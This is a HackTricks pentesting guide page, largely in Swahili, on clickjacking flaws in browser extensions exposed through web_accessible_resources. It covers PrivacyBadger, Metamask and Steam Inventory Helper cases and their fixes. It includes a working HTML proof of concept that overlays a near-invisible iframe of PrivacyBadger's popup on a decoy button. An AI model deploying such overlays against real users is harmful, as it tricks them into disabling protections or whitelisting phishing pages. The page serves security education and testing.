hacktricks/pentesting-web/browser-extension-pentesting-methodology/browext-clickjacking.md

# BrowExt - ClickJacking

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}

## Basic Information

Ukurasa huu utaabudu udhaifu wa ClickJacking katika nyongeza ya kivinjari.\
Ikiwa hujui ClickJacking ni nini angalia:

{% content-ref url="../clickjacking.md" %}
[clickjacking.md](../clickjacking.md)
{% endcontent-ref %}

Nyongeza ina faili **`manifest.json`** na faili hiyo ya JSON ina uwanja `web_accessible_resources`. Hapa kuna kile [nyaraka za Chrome](https://developer.chrome.com/extensions/manifest/web\_accessible\_resources) zinasema kuhusu hilo:

> Rasilimali hizi zitapatikana kwenye ukurasa wa wavuti kupitia URL **`chrome-extension://[PACKAGE ID]/[PATH]`**, ambayo inaweza kutengenezwa kwa kutumia **`extension.getURL method`**. Rasilimali zilizoorodheshwa zinatolewa na vichwa vya CORS vinavyofaa, hivyo zinapatikana kupitia mitambo kama XHR.[1](https://blog.lizzie.io/clickjacking-privacy-badger.html#fn.1)

**`web_accessible_resources`** katika nyongeza ya kivinjari si tu zinapatikana kupitia wavuti; pia zinafanya kazi kwa ruhusa za ndani za nyongeza. Hii inamaanisha zina uwezo wa:

* Kubadilisha hali ya nyongeza
* Kupakia rasilimali za ziada
* Kuingiliana na kivinjari kwa kiwango fulani

Hata hivyo, kipengele hiki kinatoa hatari ya usalama. Ikiwa rasilimali ndani ya **`web_accessible_resources`** ina kazi yoyote muhimu, mshambuliaji anaweza kuingiza rasilimali hii kwenye ukurasa wa wavuti wa nje. Watumiaji wasiojua wanaotembelea ukurasa huu wanaweza bila kukusudia kuamsha rasilimali hii iliyounganishwa. Kuamsha kama hiyo kunaweza kusababisha matokeo yasiyokusudiwa, kulingana na ruhusa na uwezo wa rasilimali za nyongeza.

## PrivacyBadger Example

Katika nyongeza ya PrivacyBadger, udhaifu uligundulika kuhusiana na saraka ya `skin/` kutangazwa kama `web_accessible_resources` kwa njia ifuatayo (Angalia [blogu ya asili](https://blog.lizzie.io/clickjacking-privacy-badger.html)):
```json
"web_accessible_resources": [
"skin/*",
"icons/*"
]
```
Hii konfigurasyonu ilileta tatizo la usalama. Kwa hakika, faili la `skin/popup.html`, ambalo linaonyeshwa wakati wa mwingiliano na ikoni ya PrivacyBadger kwenye kivinjari, linaweza kuingizwa ndani ya `iframe`. Kuingizwa huku kunaweza kutumika kudanganya watumiaji kujiingiza bila kujua kwenye kubofya "Disable PrivacyBadger for this Website". Kitendo kama hicho kingeathiri faragha ya mtumiaji kwa kuzima ulinzi wa PrivacyBadger na kwa uwezekano kupelekea mtumiaji kufuatiliwa zaidi. Onyesho la kuona la exploit hii linaweza kuangaliwa katika mfano wa video ya ClickJacking iliyotolewa kwenye [**https://blog.lizzie.io/clickjacking-privacy-badger/badger-fade.webm**](https://blog.lizzie.io/clickjacking-privacy-badger/badger-fade.webm).

Ili kushughulikia udhaifu huu, suluhisho rahisi lilitekelezwa: kuondoa `/skin/*` kutoka kwenye orodha ya `web_accessible_resources`. Mabadiliko haya yalipunguza hatari kwa kuhakikisha kwamba maudhui ya saraka ya `skin/` hayawezi kufikiwa au kubadilishwa kupitia rasilimali zinazoweza kufikiwa mtandaoni.

Suluhisho lilikuwa rahisi: **ondoa `/skin/*` kutoka kwenye `web_accessible_resources`**.

### PoC
```html
<!--https://blog.lizzie.io/clickjacking-privacy-badger.html-->

<style>
iframe {
width: 430px;
height: 300px;
opacity: 0.01;
float: top;
position: absolute;
}

#stuff {
float: top;
position: absolute;
}

button {
float: top;
position: absolute;
top: 168px;
left: 100px;
}

</style>

<div id="stuff">
<h1>
Click the button
</h1>
<button id="button">
click me
</button>
</div>

<iframe src="chrome-extension://ablpimhddhnaldgkfbpafchflffallca/skin/popup.html">
</iframe>
```
## Mfano wa Metamask

A [**blog post about a ClickJacking in metamask can be found here**](https://slowmist.medium.com/metamask-clickjacking-vulnerability-analysis-f3e7c22ff4d9). Katika kesi hii, Metamask ilirekebisha udhaifu kwa kuangalia kwamba protokali iliyotumika kuifikia ilikuwa **`https:`** au **`http:`** (sio **`chrome:`** kwa mfano):

<figure><img src="../../.gitbook/assets/image (21).png" alt=""><figcaption></figcaption></figure>

**ClickJacking nyingine iliyorekebishwa** katika nyongeza ya Metamask ilikuwa kwamba watumiaji wangeweza **Click to whitelist** wakati ukurasa ulikuwa na shaka kuwa ni uvuvi kwa sababu ya `“web_accessible_resources”: [“inpage.js”, “phishing.html”]`. Kwa kuwa ukurasa huo ulikuwa na udhaifu wa Clickjacking, mshambuliaji angeweza kuutumia kuonyesha kitu cha kawaida ili kumfanya mwathirika abonyeze kuorodhesha bila kutambua, na kisha kurudi kwenye ukurasa wa uvuvi ambao utaorodheshwa.

## Mfano wa Steam Inventory Helper

Angalia ukurasa ufuatao ili kuona jinsi **XSS** katika nyongeza ya kivinjari ilivyofungamanishwa na udhaifu wa **ClickJacking**:

{% content-ref url="browext-xss-example.md" %}
[browext-xss-example.md](browext-xss-example.md)
{% endcontent-ref %}

## Marejeo

* [https://blog.lizzie.io/clickjacking-privacy-badger.html](https://blog.lizzie.io/clickjacking-privacy-badger.html)
* [https://slowmist.medium.com/metamask-clickjacking-vulnerability-analysis-f3e7c22ff4d9](https://slowmist.medium.com/metamask-clickjacking-vulnerability-analysis-f3e7c22ff4d9)

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}